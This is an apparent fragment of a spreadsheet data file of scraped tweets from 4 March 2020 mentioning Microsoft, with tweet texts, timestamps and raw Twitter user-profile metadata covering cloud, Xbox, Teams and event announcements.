    <t>{'id': 1432612292, 'id_str': '1432612292', 'name': 'Optmyzr.com', 'screen_name': 'Optmyzr', 'location': 'United States', 'description': 'Google Ads solutions for advertisers, consultants, and agencies. Automated tools to make your life easier!', 'url': 'http://t.co/ge3ZnAHnJD', 'entities': {'url': {'urls': [{'url': 'http://t.co/ge3ZnAHnJD', 'expanded_url': 'http://www.optmyzr.com', 'display_url': 'optmyzr.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1474, 'friends_count': 343, 'listed_count': 162, 'created_at': 'Thu May 16 09:32:31 +0000 2013', 'favourites_count': 889, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 4453,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'http://pbs.twimg.com/profile_images/1001858167704379392/-CpaPU34_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1001858167704379392/-CpaPU34_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1432612292/1527715754', 'profile_link_color': 'FF8018', 'profile_sidebar_border_color': 'FFFFFF', 'profile_sidebar_fill_color': '000000', 'profile_text_color': '000000', 'profile_use_background_image': True, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Standard Bank #SouthAfrica is moving its core #SAP #Cloud Platform services to #Microsoft #Azure to significantly improve the experience customers have with the #bank. Sabelo Nkwanyana Lillian Barnard https://t.co/U3uhmJEC3x #MSFTAdvocate</t>
  </si>
  <si>
    <t>Wed Mar 04 07:29:02 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft's cloud-based printing solution enters private preview #Microsoft  #universalprint https://t.co/eWK7oGsoLx https://t.co/tzAr2qlq1a</t>
  </si>
  <si>
    <t>{'id': 120073669, 'id_str': '120073669', 'name': 'Manikandan', 'screen_name': 'himanikandan', 'location': '', 'description': 'Co-Founder @gurunchi @aztectech \n                        Founder @connectwww @duedotim', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 3, 'friends_count': 15, 'listed_count': 0, 'created_at': 'Fri Mar 05 11:38:09 +0000 2010', 'favourites_count': 2, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 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'http://pbs.twimg.com/profile_images/1210214877123317760/fIetLqGf_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1210214877123317760/fIetLqGf_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/120073669/1577375825',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</si>
  <si>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07:28:24 +0000 2020</t>
  </si>
  <si>
    <t>Call for #Speakers is open until march 23rd! Don't miss this opportunity and be a speaker at the Workplace Ninja Summit: https://t.co/7GB5BZlFnJ
#Speaker #WPNinjaS #ConfigMgr #MEMCM #MSIntune #ATP #PowerShell #TheCircle #Tech #Europe #Zurich #MEM #Microsoft #Microsoft365 https://t.co/klPf5AxuZL</t>
  </si>
  <si>
    <t>{'id': 1191285271435915264, 'id_str': '1191285271435915264', 'name': 'WorkPlaceNinjaSummit', 'screen_name': 'wpninjasummit', 'location': '', 'description': 'Connect with workplace ninjas from all over Europe', 'url': 'https://t.co/ksexFMJ2cs', 'entities': {'url': {'urls': [{'url': 'https://t.co/ksexFMJ2cs', 'expanded_url': 'http://www.wpninjas.eu', 'display_url': 'wpninjas.eu', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 200, 'friends_count': 248, 'listed_count': 0, 'created_at': 'Mon Nov 04 09:25:36 +0000 2019', 'favourites_count': 151, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 85, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1191626391978201089/YKaprZNH_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1191626391978201089/YKaprZNH_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1191285271435915264/1572940846',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</si>
  <si>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07:28:15 +0000 2020</t>
  </si>
  <si>
    <t>Now available at #Modeloe #best #online #market #place for #document #templates - #Register and #download this SAP walkthrough plan - https://t.co/2FRoTxGwfA
#microsoft #docs #document #upload #earn #picture #plan #business #startups #picture #design #uk #excel #PowerPoint https://t.co/L65scWaSLK</t>
  </si>
  <si>
    <t>Wed Mar 04 07:26:29 +0000 2020</t>
  </si>
  <si>
    <t>Seamless integration with a unified platform, all from the convenience and power of the cloud with our #Microsoft #Dynamics365 offerings.  Learn more here: https://t.co/U6rXObsfH7
#cloud #Dynamics365 #CRM #ERP  #MSPartner #CRM #CustomerRelationshipManagement #microsoftdynamics365 https://t.co/JWelAFLGFW</t>
  </si>
  <si>
    <t>Wed Mar 04 07:24:35 +0000 2020</t>
  </si>
  <si>
    <t>Does metadata still make sense in SharePoint Online? -  #SharePoint #Office365 #Microsoft   https://t.co/GQk8EkO9Au</t>
  </si>
  <si>
    <t>Wed Mar 04 07:19:26 +0000 2020</t>
  </si>
  <si>
    <t>Of the big four cloud providers, #Google grew the most last year, swelling 87.8 per cent, #Microsoft came in second, with 64 per cent growth. But #AWS's growth, at 36 per cent, was half that of its nearest rival. https://t.co/AO2Tl6Jbp8 via @theregister</t>
  </si>
  <si>
    <t>{'id': 569907670, 'id_str': '569907670', 'name': 'Stijn Floren', 'screen_name': 'FlorenStijn', 'location': 'Noeveren', 'description': 'Proud Googler | Backpacker | Rocket man | Cannibale survivor | Fighting tendency to get political/personal. (opinions are my own)', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 140, 'friends_count': 139, 'listed_count': 5, 'created_at': 'Thu May 03 11:42:04 +0000 2012', 'favourites_count': 2076, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 1610,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'http://pbs.twimg.com/profile_images/785868815183843328/2Vtm3r9b_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/785868815183843328/2Vtm3r9b_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/569907670/1361863906',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</si>
  <si>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Wed Mar 04 07:18:21 +0000 2020</t>
  </si>
  <si>
    <t>#MSSecurity #M365 #Office365 #MCTBuzz #MVPBuzz #MSTeams #Microsoft #Bechtle #zukunftsstark #OneCompany #Bettertogether Microsoft Training Days - Security and Compliance #theearlybirdcatchestheworm Thanks to Microsoft for having the opportunity to participate at this event! https://t.co/RD7LeK4rQK</t>
  </si>
  <si>
    <t>Wed Mar 04 07:16:23 +0000 2020</t>
  </si>
  <si>
    <t>Go through an intense action story as Joanna and take out enemies in Perfect Dark Zero https://t.co/FsRerqYa3O #microsoft #xbox #xbox360 #gaming #darkness https://t.co/MlD2Dg3CFo</t>
  </si>
  <si>
    <t>Wed Mar 04 07:15:03 +0000 2020</t>
  </si>
  <si>
    <t>For those in the #robotic process automation #RPA space, Charles Lamanna shares an update of how #Microsoft will democratize automation for all organizations with attended &amp;amp; unattended RPA. #MSDyn365 #PowerAutomate #MSPartner #MSFTAdvocate https://t.co/2Zlg9QxazW</t>
  </si>
  <si>
    <t>{'id': 280983634, 'id_str': '280983634', 'name': 'Reto Teutschmann', 'screen_name': 'RetoTeutschmann', 'location': 'Zurich, Switzerland', 'description': 'ðŸ˜€', 'url': 'https://t.co/vF29RdsjOz', 'entities': {'url': {'urls': [{'url': 'https://t.co/vF29RdsjOz', 'expanded_url': 'http://www.salesforce.com', 'display_url': 'salesforce.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 98, 'friends_count': 92, 'listed_count': 6, 'created_at': 'Tue Apr 12 11:57:47 +0000 2011', 'favourites_count': 72, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 1806,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'http://pbs.twimg.com/profile_images/1011977251188019200/s3Kr_3VX_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1011977251188019200/s3Kr_3VX_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/280983634/1488351018',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</si>
  <si>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Mar 04 07:14:10 +0000 2020</t>
  </si>
  <si>
    <t>Xbox Live Games With Gold For March 2020 https://t.co/TESmp2BjVf #Microsoft #XboxOne #Xbox360 #GamesWithGold #XboxLive https://t.co/yUNV4BnwnA</t>
  </si>
  <si>
    <t>{'id': 2691059700, 'id_str': '2691059700', 'name': '9To5 TechNews', 'screen_name': '9To5TechNews', 'location': 'New York', 'description': '9To5TechNews keeps you in the loop for everything you need to know for gaming and tech news. #Apple ðŸ“±#Google ðŸ¤– #Sony ðŸŽ® #Microsoft #Nintendo ðŸ²', 'url': 'https://t.co/wMTZXeIcUB', 'entities': {'url': {'urls': [{'url': 'https://t.co/wMTZXeIcUB', 'expanded_url': 'http://9to5technews.net', 'display_url': '9to5technews.net', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1526, 'friends_count': 732, 'listed_count': 156, 'created_at': 'Tue Jul 29 21:20:44 +0000 2014', 'favourites_count': 1393, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 8935,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'http://pbs.twimg.com/profile_images/689272643921522688/EAZizpeR_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/689272643921522688/EAZizpeR_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2691059700/1453170395', 'profile_link_color': '4A913C',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</si>
  <si>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07:11:32 +0000 2020</t>
  </si>
  <si>
    <t>Break down data silos with drag and drop data exploration and interactive reporting with #Microsoft #PowerBI and #Azure. Never miss a post from GCC Group. Subscribe now! https://t.co/8fMbYJDotE</t>
  </si>
  <si>
    <t>{'id': 218429391, 'id_str': '218429391', 'name': 'GCC', 'screen_name': 'GCCinnova', 'location': 'Gloucester, England', 'description': 'Business-IT Alignment | https://t.co/bxhjiOVBiW Helping SMBs grow; minimise IT security threats &amp; risks  #dynamics365 #MSDyn365 #crm #smbit #ITsupport', 'url': 'https://t.co/bxhjiOVBiW', 'entities': {'url': {'urls': [{'url': 'https://t.co/bxhjiOVBiW', 'expanded_url': 'http://www.gcc.co.uk', 'display_url': 'gcc.co.uk', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/bxhjiOVBiW', 'expanded_url': 'http://www.gcc.co.uk', 'display_url': 'gcc.co.uk', 'indices': [24, 47]}]}}, 'protected': False, 'followers_count': 498, 'friends_count': 641, 'listed_count': 77, 'created_at': 'Mon Nov 22 09:53:55 +0000 2010', 'favourites_count': 21, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 3927, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '00AEEF', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_tile': True, 'profile_image_url': 'http://pbs.twimg.com/profile_images/563259271790329856/Q5nSvrRC_normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/563259271790329856/Q5nSvrRC_normal.jpeg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/218429391/1442224301', 'profile_link_color': '00AEEF',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</si>
  <si>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07:05:25 +0000 2020</t>
  </si>
  <si>
    <t>Now available at #Modeloe #best #online #market #place for #document #templates  - #Register and #download this SAP walkthrough plan - https://t.co/bfWMlueL45
#microsoft #docs #document #upload #earn #picture #plan #business #startups #picture #design #uk #excel #PowerPoint https://t.co/VyYQiUrGS6</t>
  </si>
  <si>
    <t>Wed Mar 04 07:05:23 +0000 2020</t>
  </si>
  <si>
    <t xml:space="preserve"> NEWS  #goldenDawnald #profitMotive #xeonophobia #microsoft   ICE rigged its algorithms to keep immigrants in jail, claims lawsuit https://t.co/quccPPF6RO</t>
  </si>
  <si>
    <t>Wed Mar 04 07:04:39 +0000 2020</t>
  </si>
  <si>
    <t>With #Microsoft #Azure and First Technology PTY LTD, your company can deliver reliable, excellent service across the whole customer experience -- just like @Lay_Bare! https://t.co/m9lmkGhFzc</t>
  </si>
  <si>
    <t>{'id': 101765351, 'id_str': '101765351', 'name': 'Frikkie', 'screen_name': 'FrikEnTwit', 'location': 'Pietersburg', 'description': 'Love Technology and my family', 'url': 'https://t.co/7bO8eqWSwQ', 'entities': {'url': {'urls': [{'url': 'https://t.co/7bO8eqWSwQ', 'expanded_url': 'http://www.firsttechcloud.co.za', 'display_url': 'firsttechcloud.co.za', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 345, 'friends_count': 1022, 'listed_count': 7, 'created_at': 'Mon Jan 04 14:00:43 +0000 2010', 'favourites_count': 216, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 1861,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'http://pbs.twimg.com/profile_images/1075695476215869440/cQ0WKxMi_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1075695476215869440/cQ0WKxMi_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/101765351/1479306961',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</si>
  <si>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Mar 04 07:03:39 +0000 2020</t>
  </si>
  <si>
    <t>A man should have a hairy chest. It excites #Bristol Township   #microsoft #landscape https://t.co/te4ULzHnm5</t>
  </si>
  <si>
    <t>{'id': 1234965448657162243, 'id_str': '1234965448657162243', 'name': 'Anne Frederick', 'screen_name': 'arinpreclang', 'location': 'Portland, USA', 'description': 'When you realize you want to spend the rest of your life with somebody, you want the rest of your life to start as soon as possible.', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 8, 'friends_count': 31, 'listed_count': 0, 'created_at': 'Tue Mar 03 22:14:47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'http://pbs.twimg.com/profile_images/1234970940460666880/qYw5pfhK_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1234970940460666880/qYw5pfhK_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1234965448657162243/1583275098',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</si>
  <si>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07:00:08 +0000 2020</t>
  </si>
  <si>
    <t>Get the most out of your voice or video recordings with ASC Recording Insights on #Microsoft #Teams. Users can upload their #voice or #video #recordings, to have them analyzed and available in their Teams environment. #AI #Azure #Analytics
Learn more: https://t.co/Jx67NDOciq https://t.co/Q485rI7lsw</t>
  </si>
  <si>
    <t>{'id': 280970383, 'id_str': '280970383', 'name': 'ASC', 'screen_name': 'ASCTechnologies', 'location': 'HÃ¶sbach', 'description': 'ASC is a worldwide leading software provider for multi-channel recording, quality management and analytics.', 'url': 'http://t.co/HGHjCYIM1u', 'entities': {'url': {'urls': [{'url': 'http://t.co/HGHjCYIM1u', 'expanded_url': 'http://www.asc.de', 'display_url': 'asc.de', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 2127, 'friends_count': 2383, 'listed_count': 23, 'created_at': 'Tue Apr 12 11:21:25 +0000 2011', 'favourites_count': 217, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1677,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'http://pbs.twimg.com/profile_images/1348572164/ASC_Logo_Quadratisch_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1348572164/ASC_Logo_Quadratisch_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/280970383/1481620521',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</si>
  <si>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07:00:04 +0000 2020</t>
  </si>
  <si>
    <t>@MultiChoice , #Microsoft look to future of #entertainment in #Africa ~ https://t.co/ccC1yY3Ll3</t>
  </si>
  <si>
    <t>{'id': 192107138, 'id_str': '192107138', 'name': 'FuturewaveBusinessIT', 'screen_name': 'FuturewaveBIT', 'location': 'South Africa', 'description': 'FutureWave Business IT brings the broad subject of information and communications technology to the broadest ICT audience. Something for every enquiring mind.', 'url': 'http://t.co/BTLxzSYXLo', 'entities': {'url': {'urls': [{'url': 'http://t.co/BTLxzSYXLo', 'expanded_url': 'http://www.business-it.co.za', 'display_url': 'business-it.co.za', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1039, 'friends_count': 837, 'listed_count': 30, 'created_at': 'Sat Sep 18 05:51:36 +0000 2010', 'favourites_count': 184, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 7029,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'http://pbs.twimg.com/profile_images/602738168295608320/AVEkXkqZ_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/602738168295608320/AVEkXkqZ_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/192107138/1432538811', 'profile_link_color': '89C9FA', 'profile_sidebar_border_color': 'FFFFFF', 'profile_sidebar_fill_color': 'FFFFFF', 'profile_text_color': '333333', 'profile_use_background_image': True, 'has_extended_profile': True, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Wed Mar 04 06:59:26 +0000 2020</t>
  </si>
  <si>
    <t>$AMB #Ambrosus #Walmart #Nestle #Switzerland #IBM $IBM #Blockchain #Microsoft $MSFT in Agriculture Market To Reach USD 489.36 Million By 2026 https://t.co/xLizRotUZ3 #cryptocurrency #Crypto #ico #finance #altcoin #startup #Investment #Stock #Bitcoin $BTC $ETH $ETC $BCH $LINK $XRP</t>
  </si>
  <si>
    <t>{'id': 1177418616767049729, 'id_str': '1177418616767049729', 'name': 'â‚¿SpaceðŸ›¸ðŸ›¸', 'screen_name': 'CryptoLits', 'location': 'Los Angeles, CA', 'description': 'ðŸˆEvery achievement grows out of the seed of determination \U0001fa82#Blockchain #Cryptocurrency My opinion only, not investment advice $BTC $BCH $ETC $AMB-#SupplyChain', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 3109, 'friends_count': 331, 'listed_count': 1, 'created_at': 'Fri Sep 27 03:04:18 +0000 2019', 'favourites_count': 1603, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1016, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1205702812539031554/Qi6TIFtw_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1205702812539031554/Qi6TIFtw_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1177418616767049729/1575928708',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</si>
  <si>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06:58:02 +0000 2020</t>
  </si>
  <si>
    <t>Ahead of tomorrow, Microsoft sends a birthday message. 
Thank you #Windows10 #Microsoft https://t.co/4fziNBiYre</t>
  </si>
  <si>
    <t>{'id': 3238948245, 'id_str': '3238948245', 'name': 'Femi Greaterheights â', 'screen_name': 'greaterheights_', 'location': 'Lat. 7.2526Â°E, Long. 5.1931', 'description': 'Broadcast Engineer, Radio Host - Talk Tech @EmpireRadio1045\n\n2D Graphics, UI/UX Designer, #Podcaster #WordPressAkure #WebDev \n\n08111119700\n\n#Adobe #GHSolutions', 'url': 'https://t.co/awcyyI7KLo', 'entities': {'url': {'urls': [{'url': 'https://t.co/awcyyI7KLo', 'expanded_url': 'http://anchor.fm/talktech', 'display_url': 'anchor.fm/talktech', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 2743, 'friends_count': 2970, 'listed_count': 7, 'created_at': 'Wed May 06 15:07:33 +0000 2015', 'favourites_count': 4462, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 5684,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'http://pbs.twimg.com/profile_images/1223997603454603264/kOXtms63_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1223997603454603264/kOXtms63_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/3238948245/1561401127',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</si>
  <si>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06:55:25 +0000 2020</t>
  </si>
  <si>
    <t>WINDOWS TIP: Pin a time zone to your Start Menu for easy reference. Gotta love Windows Wednesdays!
Find a couple of my short Windows courses in the list here: https://t.co/jrmXMEQssg 
#cbtntrainer #microsoft #microsoftwindows #ittips #techtips #windows10 #productivity https://t.co/7Y0UAj29U5</t>
  </si>
  <si>
    <t>{'id': 3589048642, 'id_str': '3589048642', 'name': 'Simona Millham', 'screen_name': 'SimonaTraining', 'location': 'UK', 'description': 'Training on all things Microsoft (and anything else that takes my fancy!) Follow me for Office and Windows tips and tricks! Pronouns: she/her  #CBTNTrainer', 'url': 'https://t.co/XauWBJUCuX', 'entities': {'url': {'urls': [{'url': 'https://t.co/XauWBJUCuX', 'expanded_url': 'https://learn.gg/simona-millham', 'display_url': 'learn.gg/simona-millham', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 343, 'friends_count': 88, 'listed_count': 4, 'created_at': 'Tue Sep 08 15:39:51 +0000 2015', 'favourites_count': 286, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 248,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'http://pbs.twimg.com/profile_images/690576219734151169/gTLocQ1p_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/690576219734151169/gTLocQ1p_normal.jpg',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</si>
  <si>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06:55:11 +0000 2020</t>
  </si>
  <si>
    <t>More evidence - Tough times for legacy tech vendors, and golden time for the Cloud https://t.co/GFfiMHywqq via #salesforce #AWS #GCP #IBM #ServiceNow #Microsoft #Azure #SAP #Oracle</t>
  </si>
  <si>
    <t>Wed Mar 04 06:44:57 +0000 2020</t>
  </si>
  <si>
    <t>Gain hands-on experience in Microsoft Office Excel 2016 with uCertify: https://t.co/VTdN1U1b6y
#Microsoft #MSOffice #Excel https://t.co/HI2YRl7HjO</t>
  </si>
  <si>
    <t>{'id': 7813622, 'id_str': '7813622', 'name': 'uCertify', 'screen_name': 'uCertify', 'location': 'USA', 'description': 'uCertify, a leader in career and vocation training offers the best #learning solution with 400+ titles to diverse audiences with different proficiency levels.', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 1324, 'friends_count': 3531, 'listed_count': 77, 'created_at': 'Mon Jul 30 08:05:41 +0000 2007', 'favourites_count': 720, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 3648,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'http://pbs.twimg.com/profile_images/876637446418464768/H0IEN_WA_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/876637446418464768/H0IEN_WA_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/7813622/1575211061', 'profile_link_color': 'FF3300',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</si>
  <si>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Wed Mar 04 06:43:47 +0000 2020</t>
  </si>
  <si>
    <t>Early start today for a female 'Cyrano de Bergerac'...  
On my way to #London for the #Microsoft #AzureTrainingDay AND the #Mastermind Dinner with @thomaspower &amp;amp; @pennypower...!
BRING IT ON! 
#personalgrowth... https://t.co/TXE0vDqT5j</t>
  </si>
  <si>
    <t>{'id': 186458247, 'id_str': '186458247', 'name': 'UlaSuperConnector', 'screen_name': 'USuperConnector', 'location': 'Bracknell, England', 'description': 'Ardent matchmaker, storyteller, obsessed with personal dev, passionate about making connections &amp; helping others realise how great they are! With a smile! :)', 'url': 'https://t.co/b1zMfm2Ltr', 'entities': {'url': {'urls': [{'url': 'https://t.co/b1zMfm2Ltr', 'expanded_url': 'https://about.me/ulasuperconnector', 'display_url': 'about.me/ulasuperconnecâ€¦', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 703, 'friends_count': 1305, 'listed_count': 38, 'created_at': 'Fri Sep 03 14:30:33 +0000 2010', 'favourites_count': 5679, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 3836, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '352726', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/713819974238863361/lB6lM36q_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/713819974238863361/lB6lM36q_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/186458247/1467695831', 'profile_link_color': '19CF86',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</si>
  <si>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Mar 04 06:43:46 +0000 2020</t>
  </si>
  <si>
    <t>Great insights at the Partner Marketing Academy of #microsoft #partnermarketing #dubai #socialmedia https://t.co/UFUTANmsas</t>
  </si>
  <si>
    <t>{'id': 1137667746580373504, 'id_str': '1137667746580373504', 'name': 'Caro Chmielewski', 'screen_name': 'cc_crln', 'location': 'Dubai', 'description': 'Travellover &amp; TalentManagerByHeart &amp; Recruitment Marketing Lead MENA', 'url': 'https://t.co/4gxu5b58mb', 'entities': {'url': {'urls': [{'url': 'https://t.co/4gxu5b58mb', 'expanded_url': 'http://www.publicissapient.com', 'display_url': 'publicissapient.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 12, 'friends_count': 73, 'listed_count': 1, 'created_at': 'Sun Jun 09 10:28:22 +0000 2019', 'favourites_count': 118, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 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'http://pbs.twimg.com/profile_images/1137674769464057857/3HtQUEhe_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1137674769464057857/3HtQUEhe_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1137667746580373504/1571296574',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</si>
  <si>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06:43:37 +0000 2020</t>
  </si>
  <si>
    <t>Just when you might have forgotten the ridiculous buying power and ability to invest of a company like #Microsoft...
"Microsoft strikes a new deal with NFL to have all 32 teams use #MicrosoftTeams" https://t.co/ji74zkly3r via @Inoreader</t>
  </si>
  <si>
    <t>{'id': 2256885018, 'id_str': '2256885018', 'name': 'Matthew Cobley', 'screen_name': 'MatthewCobley', 'location': 'Bath, England', 'description': 'Software developer, astrophysics graduate, shoegaze music lover, LFC fan, pizza eater.', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 98, 'friends_count': 212, 'listed_count': 34, 'created_at': 'Sat Dec 21 20:05:11 +0000 2013', 'favourites_count': 5797, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 2691,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'http://pbs.twimg.com/profile_images/909824992333922304/3JIeAJAU_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/909824992333922304/3JIeAJAU_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2256885018/1398538718',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</si>
  <si>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06:42:12 +0000 2020</t>
  </si>
  <si>
    <t>Xbox Series X Specs And Backwards Compatibility Details  https://t.co/fgiFGz7vHf #Microsoft #XboxSeriesX #Xbox https://t.co/dBUhCaNGLi</t>
  </si>
  <si>
    <t>Wed Mar 04 06:40:47 +0000 2020</t>
  </si>
  <si>
    <t>#Google cancels the most-awaited #tech event while @Microsoft plans to grant free access to #teleconferencing tools to encourage #remotework
@Google #Microsoft #IO2020 #GoogleIO2020 #COVID19 #Coronavirus #CDC #WHO #News #TechNews #TechUpdate #MobileCoderz
https://t.co/y1LxmJGTmc</t>
  </si>
  <si>
    <t>{'id': 4724356176, 'id_str': '4724356176', 'name': 'MobileCoderz', 'screen_name': 'MobileCoderz', 'location': 'Noida, India', 'description': "We Don't Build Just Mobile Apps, We Build Memorable Experiences!", 'url': 'https://t.co/ncSGlmC3Pe', 'entities': {'url': {'urls': [{'url': 'https://t.co/ncSGlmC3Pe', 'expanded_url': 'https://www.mobilecoderz.com', 'display_url': 'mobilecoderz.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 671, 'friends_count': 848, 'listed_count': 4, 'created_at': 'Thu Jan 07 17:21:55 +0000 2016', 'favourites_count': 173, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 1731,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'http://pbs.twimg.com/profile_images/702372550475714561/t-DlvM9e_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/702372550475714561/t-DlvM9e_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/4724356176/1568112377',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</si>
  <si>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06:37:18 +0000 2020</t>
  </si>
  <si>
    <t>Join the webinar: https://t.co/rAfB1xy2Ty
Listen to Zen3s Renaud Montes as he speaks about how you can use big data to predict customer loyalty and improve engagement.
#zen3 #microsoft #customerengagement #customerloyalty #bigdata #microsoftoffice365 #microsoft365 https://t.co/nLqwXopPmI</t>
  </si>
  <si>
    <t>Wed Mar 04 06:35:21 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft and #Google are giving free premium services for #microsoftteams and #hangouts for sometime due to #coronavirus. https://t.co/yfdT2TUvRT</t>
  </si>
  <si>
